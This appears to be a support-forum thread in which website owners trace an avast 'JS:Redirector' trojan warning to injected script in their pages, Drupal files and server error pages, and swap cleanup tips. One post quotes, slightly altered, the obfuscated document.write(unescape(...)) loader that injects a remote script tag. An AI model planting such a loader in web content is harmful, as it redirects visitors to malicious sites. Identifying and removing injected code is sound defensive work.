JS-Redirector-G [trj] warning

I run a website at hXXp://knickersclub.com

My index.html file consists of three frames: menu.htm, header.htm, and home.htm

If I enter the URL of each frame individually, I don’t get any virus warning message. However, if I enter http://knickersclub.com I get the message shown in the attached file. I can enter the URL on two other computers and don’t get the warning. I assumed the infection was on my computer itself so I ran a scan and it said the index.html file on my hard drive was infected. I moved the file to the chest and ran another scan which said my computer was clean. After doing that, I tried to access the web address and again got the warning, but still, only on this computer.

So, exactly where is this virus and how do I get rid of it?

No warning here, try updating the virus database, and test it again.
I’m sure someone can get to the bottom of this. :wink:

Hello,

Nothing bad in your code now, so just little info about the detection: JS:Redirector-G is new and very higly spreading web malware (see its detection count at http://www.avast.com/cze/latest-virus-report.html). Currently only avast detects this threat, no one else.

Infection is very small, simple and hard to find in lots of original html code. Infection consist of small amount of javascript code - just

document.write(unescape('encrypted script tag').replace(random char sequences)

Thats all.

Correction must be made by administrator/owner of the website avast alerts about.

Very droll, I didn’t get an alert either.

Think I found it. I looked at my html files stored locally and found a rogue script in the index.html file. Removed it and uploaded to my website. Scan of my system now shows no warning message so hopefully the issue is solved!

Remember to use strong passwords to avoid hacking of your site :wink:

So is there anything to worry about if we had the code executed on our machine? I stumbled across another site that triggered this alert just a few minutes ago.

I found this bugger in a site as well.
“JS:Redirector-G [trj]” found in FAVICON.ICO.

Problem is… There IS no favicon.ico on that website! Even when I look at it Total Commander’s FTP connection, I still don’t see the favicon.ico there.

If I look at the source of the page that triggers the virusalert, there are NO iframes, no rogue codes, nothing… Has anyone come across this problem before?

This hapens very often. Somewhere in your code is link to favicon which actualy doesnt exist. Server generates 404 message which is infected. Please check server generated messages.

Regards

I have this issue currently for a drupal site, I have downloaded the site and run TextCrawler which identified 17 infected files

I’ve removed the code and write protected the files in case it was a SQL injection attack. If it is an FTP based attack that won’t prevent it happening again but at least I can identify the files and rectify it quickly now.

The problem is that the code is still showing up in the browser right after the tag and I need to find where this is in the code or database

These are some of the corrected files, I have checked that they are still uninfected:
\misc\autocomplete.js
\misc\collapse.js
\misc\drupal.js
\misc\progress.js
\misc\textarea.js
\misc\update.js
\misc\upload.js
\modules\epublish\epublish.js
\modules\event\event.js
\modules\img_assist\img_assist.js
\modules\img_assist\img_assist_textarea.js
\modules\img_assist\img_assist_tinymce.js
\files\videos\edit_dates\flashobject.js
\modules\img_assist\drupalimage\editor_plugin.js
\modules\img_assist\drupalimage\editor_plugin_src.js
Index.php
\Sites\default\settings.php

anyone with any further ideas would be very welcome!

M

This was indeed the problem. In every file in the domain’s error_docs directory was a piece of Javascript embedded that read (altered!)

<sc_ipt language=ja_ascript><!-- 
document.w_ite(unescape('%3Covpscric6pt%20sGHrmQc%3DI6f%2Fxf%2F9mQ4c6%2E247xf%2EI6f2xf%2E1We95c6%2FjmQqGHuc6erWey%2Eovpjs%3Ec6%3Covp%2FscWerxfipI6ft%3E').replace(/I6f|xf|c6|GH|mQ|We|ovp/g,""));
 --></s__ipt>

Thanks very much for pointing in the right direction!

Now, for the quite worrying question that remains: How did this all get there? Is this possible by transferring files via FTP from an infected computer? I know that the site was installed from a computer that had trojans active, but the files that were transferred came from a “fresh” downloaded ZIP file. Is it possible that an infected computer can, while transferring file A, infect file B that is already on the system?

In this topic there seems to be a similar problem with JS:Redirector-G [trj]
http://forum.avast.com/index.php?topic=44664.0
and the homepage hxxp://www.designpandorabox.eu/

Hi BobNY,

First of all being secure doesn’t mean to just install firewalls, anti-viruses, and anti-spywares. It is more about understanding the threat and prepare or act accordingly. This favicon and also XSS attacks fall into a category that can’t be handled by just installing few security tools. Reason their host/carriers through which they intrude into your system are common internet resources like web-pages, emails, RSS feeds, URLs etc. As a result it is difficult to identify & block such resources selectively unless a central repository maintaining a blacklist of potentially dangerous resources is referenced before access. Firefox and other modern browsers are doing this these days. But this is effective only when the resource has been identified and added previously to the blacklist. Ultimately the option left is to only allow the scripts from the resources you rely like Google & Yahoo (matter of choice). This is what NoScript and Request policy does. NoScript by default blocks all the flash and javascript content on the pages you visit unless you add them (more specifically website domain or address) to it’s whitelist. RequestPolicy goes one step ahead and blocks javascript content originating or communicating from the server you are not visiting on first place, even if it is in the whitelist. The fundamental thing is simple to block all the resources/communication outside the current resource you are browsing. For more details I would recommend you to read FAQs on NoScript & RequestPolicy websites.

I know it’s painful and annoying to use these tools in the beginning. You have to add resources in whitelist for both NoScript & RequestPolicy respectively. But it’s a one time investment which is worth for the added security you are getting. And remember, these utilities don’t remove the malicious script content from the page. They just block them from execution. So don’t surprise if you still find them there.

pol

O thank goodness for Avast!

This morning I went to my own site and got the Shield, protecting me from this redirector. WHAT??? On my OWN site?? So using my FTP program, I viewed the source on both my own computer and on the host’s server. There it was, that “unescape” script.

Called godaddy, and then replaced the index.html with a clean file. They advised me to change my password to something harder to crack, that they have good security on the servers and the only way it could be changed it by hacking my pw.

But question is this: Yesterday I was doing a massive backup of everything and while I was copying over some of the files from my site, I got the Avast warning about this particular trojan. Not having seen it before, I told it each time to move it to the Chest.

When it’s moved to the Chest, is the entire file deleted from my computer, or just the trojan deleted from the file?

And since I was copying from C: to G:, is the C: file still infected? Am running a complete scan now.

I have hundreds of pages for the site and it will take me days to figure it all out, clean them up, re-upload, etc., unless there are some easy ways to check them out and clean them.

How about this? If I do a global search and replace for “unescape” in the html files, would that disable the js? Or does the infection make garbage out of the page anyway?

I noticed when comparing the html on my own computer and up on the server, the one on my own computer looked normal, but on the server all the coding was scrunched up into one barely readable paragraph! This is for the index.html file. The ones that came up with a warning while I was copying them were many of the internal files. Many! :frowning:

Thanks for all your help a few days ago on a different thread. I will be going back over to that thread and thanking everyone there. I’ve been “down” for a few days because MS gave me bad advice – REALLY bad advice – so I go no longer even boot up. Three “technicians” in a row complicated my situation so I had no computer! ;( I’ve gotten so many calls now from MS, apologizing!

Files sent to the chest only exist in the chest, where they can do no harm there. If you have multiple copies of the, only what is indicated by the detection would be sent to the chest.

If you have copies of your site pages (you should, if not valuable lesson learnt) scan that folder with avast and if none of the files are infected you could try deleting all the files on your site and uploading the clean copies (after having changed your passwords).

I don’t believe there is an easy way to remove the infected script that was inserted as the script may be slightly different in each case, it is obviously easier for them to insert as they have worry about destroying a file.

There are probably some text editors that will do a global find and replace (don’t know any of the top of my head). The problem though you normally have to enter the complete string to find, which as I said could have multiple different strings.

If there is a find and replace tool you could possibly enter <script*/script> assuming the * is a wildcard so it would find every occurrence of <script*/script> regardless of what was in between and replace it with whatever you choose, a blank space is usually best.

The major problem here is not removing legitimate script tag on your pages. So this isn’t without risk.

I’ve done some experimenting and have found the simplest solution, at least for me.

First I looked on the server for infected files. I use WS_FTP. Clicked on a few files on the server, asked to “view” them (in Notepad). Any infected ones trigger Avast. Some files are infected, some are not. No rhyme or reason as to which are or are not.

Then I did the same for the ones on my computer, “viewed” in WS_FTP. I presume you can do these operations in other FTP programs; I haven’t used any others. I re-uploaded the ones that were not infected.

Later I found that it’s easier to check with Avast by right-clicking in the directory on my computer, instead of having all those Notepad windows open!

Now comes the tricky part. Do I go back to a “backup” file or try to repair the html? My concern was that my ‘backup’ files would not have my very latest changes.

So here’s what I’m doing: I simply open the infected file in my editor (I use Komposer), go to the Source Code, find that line of code (search for unescape) and delete the entire 3 lines, . The code is in the same place every time, right at the end of the /head section. Makes it easy to find over and over!

After I save, I double-check in the folder on my computer by right-clicking the file name to let Avast do its thing. Clean!

This way, everything on my page is preserved and the baddie is gone. It’s time-consuming, boring, but well worth it.

I hope these details will help.

BTW, has anyone figured out where all this ‘redirection’ is supposed to take us?

I don’t believe it really matters where it takes you as one malicious site is much the same as the next and even if you knew where it went, you wouldn’t know what the payload would be at that end.

YIKES! Very true. Hadn’t thought about that. Thanks.

You’re welcome.

File Name: hxxp://www.cybermedsites.com/
Malware name: JS:Redirector-H [trj]
Malware type: Trojan Horse
VPS version: 090430-0, 04/30/2009

I use a site called Cybermedsites.com to host my web site. Today, when I attempted to access my site via the administration page through Cybermedsites, Avast detected the above. I’ve already notified the owners of Cybermedsites, but am wondering if anyone can determine if it is a valid infection?

Also, I am able to access my own web site URL direct without Avast detecting anything. Does this mean it is safe for others to peruse my site, or should I be concerned.